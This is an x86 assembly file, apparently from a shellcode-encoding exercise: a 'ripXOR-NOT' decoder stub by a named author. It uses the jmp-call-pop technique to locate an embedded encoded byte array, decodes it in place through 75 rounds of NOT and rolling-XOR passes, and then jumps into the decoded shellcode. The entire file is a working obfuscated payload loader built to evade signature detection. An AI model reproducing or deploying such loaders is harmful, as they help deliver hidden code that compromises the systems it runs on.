
; ripXOR-NOT decoder stub
; Author: Chase Hatch
; auto-generated by ripXOR-NOT.py
section .text
global _start
_start:
	jmp short string_call
popper:
	xor ebx, ebx
	xor ecx, ecx
	xor esi, esi
	xor edi, edi
	pop esi
	mov edi, esi
	mov cl, 75
iterator:
	push ecx
	mov cl, scode_len
pass1_decode:
	not byte [esi]
	inc esi
	loop pass1_decode
	mov esi, edi
	mov cl, scode_len
	mov bl, 135
pass2_decode:
	xor byte [esi], bl
	inc esi
	dec bx
	loop pass2_decode
	pop ecx
	loop iterator
	jmp short scode
string_call:
	call popper
	scode 	db	0x49,0xb9,0x4b,0xa0,0x4d,0xb4,0x4f,0xad,0xb1,0x77,0xb3,0x7c,0xd4,0xed,0xe4,0xe6,0xfb,0xe1,0xe2,0xe9,0xe5,0xe3,0xa1,0xe7,0xbf,0xbe,0xbd,0xbc,0x1d,0x76,0xc6,0xff,0xfb,0x09,0x0a,0x0b,0xf4,0xb0,0xf0,0xf0,0xd2,0x28,0xe6,0x87,0xa1,0xf5,0xce,0xcf,0xf5,0x93,0xf0,0xc3,0xf7,0xcf,0xcf,0xdc,0xd8,0xe1,0xe1,0x82,0x89,0x73,0xf2,0x93,0xb3,0x99,0xea,0x36,0x88,0x99,0x33,0xf1,0xd4,0x90,0x91,0x4a,0x25,0x95,0x4b,0x91,0xcc,0x9b,0x47,0xdf,0xe8,0x7d,0xc5,0x02,0x50	
length_call:
	scode_len:	equ $-scode
